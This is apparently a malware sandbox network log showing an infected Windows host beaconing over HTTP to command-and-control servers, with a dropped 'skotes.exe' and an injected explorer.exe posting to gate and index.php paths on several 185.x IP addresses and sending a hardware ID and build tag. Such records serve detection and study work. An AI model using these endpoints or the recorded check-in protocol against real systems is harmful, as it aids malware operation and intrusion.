Dec 12, 2024 16:50:08.961795092 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:10.244048119 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.10	50174	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:09.148330927 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:50:09.269536018 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.10	50176	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:09.783271074 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:09.904036045 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:11.388235092 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.10	50182	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:11.622370005 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:11.742161036 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:13.073447943 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.10	50183	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:12.212207079 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:13.539308071 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.10	50184	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:13.344489098 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:13.465562105 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:14.785942078 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.10	50192	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:15.026617050 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:15.152143002 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:16.722328901 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.10	50194	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:15.977622986 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:17.279499054 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.10	50195	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:16.950519085 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:17.071221113 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:18.684222937 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.10	50196	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:18.924328089 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:19.044986963 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:20.618472099 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.10	50200	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:19.439105988 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:20.792407990 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.10	50202	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:20.863734961 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:20.988187075 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:22.514848948 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.10	50205	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:21.882158995 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:50:23.197885036 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 12, 2024 16:50:23.750991106 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="build"stok------BKKKFCFIIJJKKFHIEHJK--
Dec 12, 2024 16:50:24.196363926 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.10	50207	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:22.763206959 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:22.890925884 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:24.507292986 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.10	50209	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:22.942434072 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:24.260996103 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.10	50211	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:23.195369959 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:24.281846046 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75266 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:24.972543001 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:25.288101912 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75267 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:25.636627913 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:25.951195955 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75267 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:26.396147013 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:26.711131096 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75268 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:26.946046114 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:27.261884928 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75269 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:27.595668077 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:27.910432100 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75269 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:29.005345106 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:29.319724083 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75271 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:32.377999067 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:32.694256067 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75274 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:42.881143093 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 12, 2024 16:50:43.794639111 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:44.113847971 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75285 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:51.859216928 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:50:52.173892021 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75294 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:50:53.392733097 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
